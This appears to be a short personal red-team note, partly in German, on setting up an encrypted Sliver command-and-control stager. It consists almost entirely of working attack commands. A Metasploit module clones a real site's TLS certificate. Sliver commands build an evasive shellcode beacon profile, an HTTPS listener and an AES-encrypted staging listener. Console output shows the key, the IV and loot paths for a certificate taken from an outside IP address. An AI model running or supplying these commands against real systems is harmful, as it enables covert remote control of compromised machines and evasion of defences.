Sliver encrypted stager

Probleme beim shencode inject, prüfen --prepend-size

# metasploit
use auxiliary/gather/impersonate_ssl
 
# sliver
## new profile
profiles new beacon -b https://$ip:443 -f shellcode --timeout 300 --seconds 5 --jitter 1 --skip-symbols --evasion $profilename
 
## listener TLS support
https -L $ip -l 443 -c /dir/cert.crt -k /dir/key.key
 
## 256 Bit Key = 32 Bytes
## IV 16 Bytes
## gzip compression
## 
stage-listener --url https://172.29.17.74:8080 --profile $profilename -c /dir/cert.crt -k /dir/key.key -C gzip --aes-encrypt-key ccuxGzZkf6NoThrhxq8NFPVhnE3Nlbun --aes-encrypt-iv liowuFwnLZeW4zIN

/home/kali/.msf4/loot/20250224182047_default_82.165.229.83_82.165.229.83_ce_323630.crt
/home/kali/.msf4/loot/20250224182047_default_82.165.229.83_82.165.229.83_ke_629120.key
 
[*] Sliver name for profile obf4: CURLY_SHOW-STOPPER
[*] Job 11 (https) started
[*] AES KEY: ccuxGzZkf6NoThrhxq8NFPVhnE3Nlbun
[*] AES IV: liowuFwnLZeW4zIN

https://wsummerhill.github.io/redteam/2023/07/25/Sliver-C2-Usage-for-Red-Teams.html

hckhsn

Explorer

Sliver encrypted Stager

Sliver encrypted stager

Graphansicht